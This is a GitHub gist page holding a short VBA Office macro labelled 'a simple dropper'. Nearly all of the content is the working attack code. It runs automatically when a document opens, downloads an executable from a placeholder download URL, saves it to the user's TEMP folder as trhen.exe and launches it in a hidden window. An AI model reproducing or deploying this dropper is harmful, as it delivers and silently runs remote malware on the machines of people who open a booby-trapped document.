-
-
Save reanimat0r/ef41126b80976491ad4e67b8fb5394f5 to your computer and use it in GitHub Desktop.
A simple dropper used with Office macro
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Sub AutoOpen() | |
| Auto_Open | |
| End Sub | |
| Sub Auto_Open() | |
| payloadURL = "<Download URL>" | |
| Dim req: Set req = CreateObject("Microsoft.XMLHTTP") | |
| Dim payloadStream: Set payloadStream = CreateObject("Adodb.Stream") | |
| req.Open "GET", payloadURL, False | |
| req.Send | |
| tmpDir = Environ("TEMP") | |
| exePath = tmpDir + "\trhen.exe" | |
| With payloadStream | |
| .Type = 1 | |
| .Open | |
| .write req.ResponseBody | |
| .savetofile exePath, 2 | |
| End With | |
| Set WshShell = CreateObject("WScript.Shell") | |
| cmds = WshShell.Run(exePath, 0, True) | |
| Set WshShell = Nothing | |
| End Sub |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment